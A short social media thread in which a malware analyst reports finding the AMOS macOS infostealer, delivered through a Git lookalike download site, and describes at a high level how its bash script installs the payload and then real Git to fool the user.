Profile picture of Bhargav Rathod

Bhargav Rathod

@malwr4n6

Published: March 20, 2025
5
9
37

Happened to analyze a suspicious macOS file. A developer downloaded Git from a git lookalike domain. Turns out to be #AMOS :) Thanks to @obje tool Lulu @patrickwardle Check out for more in the thread #macos #malwareanalysis #malware #infostealer

Image in tweet by Bhargav Rathod

Turns out this bash script downloads a dmg file, mounts it, executes it and then installs legit git via homebrew! Nice trick to fool a user 😈

Image in tweet by Bhargav Rathod

Share this thread

Read on Twitter

View original thread

Navigate thread

1/2